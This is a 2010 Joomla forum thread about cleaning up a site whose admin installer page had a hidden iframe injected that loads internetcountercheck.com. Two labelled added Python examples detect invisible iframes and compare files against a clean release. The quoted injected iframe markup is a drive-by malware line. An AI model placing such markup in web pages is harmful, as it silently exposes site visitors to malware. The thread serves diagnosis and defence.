virus / php injection internetcountercheck.com in backend!

delhidjinn
Joomla! Apprentice
Posts: 17
Joined: Mon Apr 27, 2009 6:21 pm
Location: New Delhi, India

virus / php injection internetcountercheck.com in backend!

Post by delhidjinn » Sun Jun 06, 2010 3:20 am

On loading http://uniqueindiatour.com/administrato ... _installer I get the Chrome message of this malware.

On the front end it is not visible.

I have changed the ftp password.

This is since yesterday. I had installed the Ninja RSS component, which I later found, after this event, Joomla advises against using.

I have removed Ninja Rss but the problem persists.

I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.

When I do view-source:http://uniqueindiatour.com/administrato ... _installer in the code I find this:

<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>

It is only when I want to install something that this maliciousness is visible.

I checked the php code of com_installer but could not find any reference to it.

Will I be able to remove it easily?

I have in the meantime advised my hosting provider to do a virus scan as well.

Thanks in advance.
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
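A check for the kind of markup quoted in the post above, as an added example that is not part of the original thread: it parses a saved copy of a page and reports iframes that are sized or styled to be invisible, noting whether they load from another host. The sample HTML and host names are constructed placeholders; since the injection described here appeared only in the backend, the input would be page source saved from a logged-in administrator session.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the markup quoted in the post above; the
# hosts are placeholders, not the domains from the thread.
SAMPLE = (
    '<form><input type="hidden" name="token" value="1" /></form>'
    '<iframe src="http://counter.example.net/?click=1" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>'
    '<iframe src="/administrator/preview.html" width="600" height="400"></iframe>'
    '<div class="clr"></div>'
)

HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


class HiddenFrameFinder(HTMLParser):
    """Collects iframes that are sized or styled so a visitor never sees them."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        reasons = []
        # Width or height of 0 or 1 (with or without "px") means nothing is shown.
        if any(re.fullmatch(r"[01](px)?", a.get(d, "").strip()) for d in ("width", "height")):
            reasons.append("tiny")
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("hidden-css")
        # Relative URLs have no hostname and therefore count as same-site.
        host = urlparse(a.get("src", "")).hostname
        if host and host != self.site_host:
            reasons.append("off-site")
        if "tiny" in reasons or "hidden-css" in reasons:
            self.findings.append((a.get("src", ""), reasons))


def find_hidden_iframes(html, site_host):
    """Return a list of (src, reasons) for every invisible iframe in html."""
    finder = HiddenFrameFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings
```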

Re: virus / php injection internetcountercheck.com in backen

Post by delhidjinn » Sun Jun 06, 2010 8:01 am

I have solved this. The help was from here http://www.msamir.net/joomla-and-wordpress-virus/

Basically, I downloaded the full package of Joomla 1.5.18, unzipped it on my machine, and uploaded all the files to the webserver. After this, it gave me the message that I need to delete the installation folder, which I did.
After this, in the first tests, all izz well :)

Hope I do not have to post again. :)

Re: virus / php injection internetcountercheck.com in backen

Post by delhidjinn » Sun Jun 06, 2010 9:07 am

Spoke too soon!
A few components were infected as well. Had to uninstall them and re-install. Seems to work for the moment.
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
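The clean-up in the posts above overwrote core files from a fresh package and then found infected components separately. As an added example that is not part of the original thread, the sketch below hashes a local copy of the site against an unpacked clean release and lists core files that differ and files the release does not contain; the directory layout and file names in `demo()` are constructed.

```python
import hashlib
import tempfile
from pathlib import Path


def file_hashes(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_to_clean(site_root, clean_root):
    """Classify site files against a clean unpacked release of the same version."""
    site, clean = file_hashes(site_root), file_hashes(clean_root)
    return {
        # Core files whose content no longer matches the release: restore these.
        "modified": sorted(p for p in site if p in clean and site[p] != clean[p]),
        # Not shipped in the release (extensions, config, uploads): review each
        # against its own original package, since these are not fixed by re-upload.
        "extra": sorted(p for p in site if p not in clean),
        # Shipped in the release but absent on the site (e.g. installation/).
        "missing": sorted(p for p in clean if p not in site),
    }


def demo():
    """Build two small constructed trees and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = Path(tmp, "clean"), Path(tmp, "site")
        core = "administrator/components/com_installer/file.php"  # constructed name
        for root in (clean, site):
            (root / core).parent.mkdir(parents=True)
            (root / core).write_text("<?php // core file\n")
            (root / "index.php").write_text("<?php // front controller\n")
        (site / core).write_text("<?php // core file\n// appended line\n")
        addon = site / "components/com_example/example.php"  # constructed name
        addon.parent.mkdir(parents=True)
        addon.write_text("<?php // third-party\n")
        (clean / "installation").mkdir()
        (clean / "installation/index.php").write_text("<?php // installer\n")
        return compare_to_clean(site, clean)


if __name__ == "__main__":
    print(demo())
```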

Danayel
Joomla! Enthusiast
Posts: 236
Joined: Sun Feb 11, 2007 4:59 am
Location: Nagoya, Japan

Re: virus / php injection internetcountercheck.com in backen

Post by Danayel » Fri Jun 25, 2010 11:35 pm

Hi delhidjinn,

How do you know it was Ninja RSS that caused it and not just a coincidence of timing?

This virus can only be planted with FTP access to your site which Ninja RSS doesn't have, enable or give.

It also seems odd that it happened the same day you installed Ninja RSS, but we haven't had any other reports of sites being infected with this virus via Ninja RSS.

Can you be certain it was Ninja RSS?

P.S. What do you mean, Joomla advises against Ninja RSS?
NinjaForge - More than 60 Professional, Open Source, Web 2.0 Extensions
http://ninjaforge.com - Get on the cutting edge.

Re: virus / php injection internetcountercheck.com in backen

Post by delhidjinn » Sat Jun 26, 2010 1:44 am

Now that we are discussing this:

It could be coincidence because just a day before I gave FTP access to my SEO company, maybe it happened then.

I was certain of Ninja RSS because that was the only component I had installed in those days. But I gave FTP access as well, which I had immediately discontinued on discovering this injection and uninstalled Ninja RSS. Also, as the component figures on Joomla's caution list, it was a case of 2 + 2 - that's all.

Joomla advises against Ninja RSS: it was due to the list of components with known vulnerabilities which is the Joomla caution list.

Re: virus / php injection internetcountercheck.com in backen

Post by Danayel » Sat Jun 26, 2010 2:13 am

It should have been taken off the list as we removed the vulnerability 15 minutes after it was announced and we emailed them. It was some code left over from the previous developer which we hadn't noticed. :(

I will email them again. Thanks for letting me know.

Which SEO company do you use by the way?